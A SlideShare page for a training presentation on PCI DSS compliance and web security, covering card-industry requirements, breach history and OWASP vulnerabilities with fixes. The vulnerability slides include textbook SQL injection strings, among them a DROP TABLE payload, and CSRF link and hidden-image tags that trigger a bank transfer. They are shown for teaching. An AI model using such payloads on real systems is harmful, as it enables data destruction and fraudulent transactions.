PCI DSS and Security overview.
Upcoming SlideShare
Loading in...5

PCI DSS and Security overview.



PCI-DSS and Security overview.

PCI-DSS and Security overview.
Good information about PCI(definition, history, need, appliance, ...).
Some famous security vulnerabilities with clear examples



Total Views
Views on SlideShare
Embed Views



0 Embeds 0

No embeds



Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment
  • Why do we need to secure our online softwares, e-shopping cart?All of us heard about the risks, hackers and security breaches that broke down a many companies in the last 20 years and cause a lot damage for many merchants and business.Steal cc information from customers, credit card operations.
  • With data security compromises on the rise it more important than ever to take measures to safeguard our customers and business.Hackers can pose a risk to our business both on-site and remotly, making it necessary to implement procedures to protect sensitive data.The largest breach in history: 94 million card numbers stolen in 2007 occurred at JT Max (clothing retailer)70% of all database breaches are internal.Here in CME we had to learn and apply PCI requirments in Subway project, all of us know that Subway sells food, drinks etc, so the system must process and transfer payments between customers and Subway restaurents. The last couple month we focused on applying DSS requirements, and we passed the PCI assessments.
  • Companies like Visa, MasterCard and others start implementing procedures and solutions to prevent attackers and safeguard merchants.But before 2004 each company had its own security system, which made merchants confused, choosing which one to work with.
  • In 2004 the Payment Card Industry Data Security Standard (PCI – DSS) was created by the 4 major credit cards brands:VISAMasterCardDiscoverAmerican ExpressThese brands establish additional security standars and updating the existing ones. They put all solutions toghether and came up with DSS.And they form the Security Standard Council.Payment Card Industry (PCI) Data Security requirements apply to all Members, merchants, and service providers that store, process or transmit cardholder data.
  • Who are the players in the flow?Visa or MasterCard are made up to organisations who can be either Acquires, Issuers or both.Acquires are the Members of the visa or MasterCard orginisations which handle Merchants.Issuers are the Members of the Visa or MasterCard orginsations that issue the cards to Cardholders.Merchants are those entities who Accept card transactionsCardholders are consumers like us.Service Providers are the entities that provide any service requiring the processing, storing or transport of card information on behalf of any of the above.
  • Cardholder data: > Primary Account Number (PAN): yes yes > Cardholder Name: yes yes > Service Code: yes yes > Expiration Date: yes yesSensitive authentication Data: > Magnetic Stripe: No N/A > CVV2/CVC2/CID2: No N/A > PIN/ PIN Block: No N/A
  • By classificaiton: Service Providers have stronger validation requirements than Merchants.By size: Entities that process larger volumes have stronger validation requirments than those who process smaller volumes.
  • 1. Install and maintain a firewall configuration to protect data.1. Do not use vendor-supplied defaults for system passwords and other security parameters.2. Protect stored data.2. Encrypt transmission of cardholder data and sensitive information across public networks.4. Use and regularly update antivirus software.4. Develop and maintain secure systems and applications5. Restrict access to data by business need-to-know.5. Assign a unique ID to each person with computer access.5. Restrict physical access to cardholder data.6. Track and monitor all access to network resources and cardholder data.6. Routinely test security systems and processes.7. Establish high-level security principles and procedures.
  • This is the highly recommended design:Presentation layer (web)Web servers are publically accessible, generate contents to the custommers. No sensitive data storageProcessing layer (application)Should never be publicly accessible. This layer role is to process, format and prepare data for storage or transmission.Data-storage layerShould never be publicaly accessible, since it may store sensitive information (payment card data, …)
  • Vulnerabilities caused by Insecure Coding Practices

PCI DSS and Security overview. PCI DSS and Security overview. Presentation Transcript

  • PCI-DSS and Security Overview
  • Agenda  Introduction  Security in Software Industry  Top 10 Vulnerabilities  Examples  Threats & Risks  PCI DSS  Security Breaches examples and solutions  Q&A
  • Introduction  Security is hard to achieve  Security is relevant  Assess the risk, so you can define your security level  Industry is now more aware about the risk  End-users are more affected by breaches  Phones, Tablets, Notebooks  Social Networks
  • Security in the Software Industry  Security means:  The public and/or private information is always available  The private information is well protected and not exposed  The user identity is always verified  Managing risk, not just avoiding vulnerabilities  In case of a breach:  Reduce the loss  Identify the compromised data  Identify the breaching source
  • Security in the Software Industry Cont’d  HTTPS, HSTS, Certificates, etc…  Physical identification of the user  Mobile Phone  Captcha  Personal questions  Physical Bundles  Code Scanning for security breaches  Security Scanning tools  Joint efforts between development and deployment teams Engineers have to bake security into the product
  • Top 10 Vulnerabilities  OWASP stands for Open Web Application Security Project https://www.owasp.org  Based on OWASP’s 2013 report, the Top 10 vulnerabilities are:  Injection  Broken Authentication and Session Management  Cross-Site Scripting (XSS)  Insecure Direct Object References  Security Misconfiguration  Sensitive Data Exposure  Missing Function Level Access Control  Cross-Site Request Forgery (CSRF)  Using Components with Known Vulnerabilities  Unvalidated Redirects and Forwards
  • Worst Security Breaches  Heartland Payment Systems  Date: March 2008  Impact: 134 million credit cards exposed through SQL injection to install spyware on Heartland's data systems.  TJX Companies Inc.  Date: December 2006  Impact: 94 million credit cards exposed.  Sony's PlayStation Network  Date: April 20, 2011  Impact: 77 million PlayStation Network accounts hacked; Sony is said to have lost millions while the site was down for a month. Full List here: http://www.csoonline.com/article/700263/the-15-worst- data-security-breaches-of-the-21st-century
  • Risks in Payment Industry
  • The gaps  Weak Configurations  OS Flaws  Programming Errors  Backdoors  Network Risks in Payment Industry Credit card theft: • Phishing attempts on the rise: to trick individuals into divulging financial info. • Many chat channels devoted to underground trading of credit card #’s
  • Before 2004
  • Credit Card Industry Players
  • Credit Card information
  • What is PCI  PCI ensure your are compliant so you avoid costly security breaches.  Define the Framework of Secure Payment Environment.  PCI Compliance is universally required, validation requirements can vary:  By classification  By size
  • PCI Requirments  Build and maintain a secure network  Protect cardholder data  Segregation of duties by deparment  Maitain a vulnerability management program  Implement strong access control measures  Regulary monitor and test networks  Maintain an information security policy
  • PCI Requirments  We can split the Requirments into 3 Major parts: 1. Network infrastructure 2. Software security 3. Regulary Monitor and Maintain Network
  • Network Infrastructure  Three-tier computing e-commerce infrastructure
  • Software Security  PCI DSS must be applied on software/code for:  POS  Mobile apps  Web Application  Common PCI Mistakes:  Storing CC info in plain text.  Poor coded websites (XSS, CSRF)  Lack of monitoring and logging  Loggin payment info  Not using SSL (at least for payment page)
  • Monitor and Maintain Network  Manager security including firewalls, digital certificates and SSL encryption  Regulary change server/network passwords  Scheduled backups (DB and Application)  Performance monitoring.  Restrict access to servers/Database.
  • What are the costs of a secruity breach?  Banned from accepting credit cards  Loss of reputation and customers  Fines up to $500,000 per incident  Replacement cards for breached accounts ($20- $30/account)
  • Vulnerabilities  Injection Flaws  Cross-site Scripting (XSS)  Cross-site Request Forgery (CSRF)  Buffer Overflows  Weak Authentication and Session Credentials  Brute force and Dictionary attacks  And more…
  • Injection flaws  In addition to SQL injection, this include OS and LDAP injection. These flaws occur when data input to a website is not properly validated by the application code, and results in the injection of potentially malicious data to execute commands that may result unauthorized access.  i.e.: Dim query As String = "select [fields] from [table] where Email = '" & email & "';"
  • Injection flaws  A normal query:  Let’s login, no need to account  What about predicting some table names  And lots more… SELECT fields FROM tableName WHERE Email = 'test@gmail.com''; SELECT fieldlist FROM table WHERE field = 'anything' OR 'x'='x'; SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; DROP TABLE members; --';
  • SQL Injection Sol.  Validate user input: length, type and syntax.  Ensure that users with permission to access the database have the leaset privileges.  Use strongly typed parameterized query APIs  Use of stored procedures instead of plain text queries.
  • Cross-site Scripting (XSS)  The result of poor application level input validation practices.  XSS allows an attacker to place a code to the victim’s browser to hijack the browser session and redirect the victim to a malicious website.  i.e.: Response.Redirect("Login.asp?ErrorMessage=Invalid"+username+"or"+password")
  • Cross-site Scripting (XSS)  The form:  The attacker changes the url:  The form will be:
  • XSS sol.  Possible sources of malicious data:  QueryString  Cookies  Posted data  XSS solutions:  Encode input parameters (client and server side)  Filter input parameters for special characters
  • Cross-site Request Forgery (CSRF)  Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like change the victim's e-mail address, home address, or password, or purchase something. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data.
  • Cross-site Request Forgery (CSRF)  i.e.:  Request:  What if also this is possible:  The easiest way:  Or: POST http://bank.com/transfer.do HTTP/1.1 ... ... ... Content-Length: 19; acct=BOB&amount=100 GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1 <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a> <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">
  • CSRF Sol.  The solution is:  Anti-Forgery Tokens  Unique token  Store in user's session  POST the token from UI  POST Data, and disable GET
  • Q&A